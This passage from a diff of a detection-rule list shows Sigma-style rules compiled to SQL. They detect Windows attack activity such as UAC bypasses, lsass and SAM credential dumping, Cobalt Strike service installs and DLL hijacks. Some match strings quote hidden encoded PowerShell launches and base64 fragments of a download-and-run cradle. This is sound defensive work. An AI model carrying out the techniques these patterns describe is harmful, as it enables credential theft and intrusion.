Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE 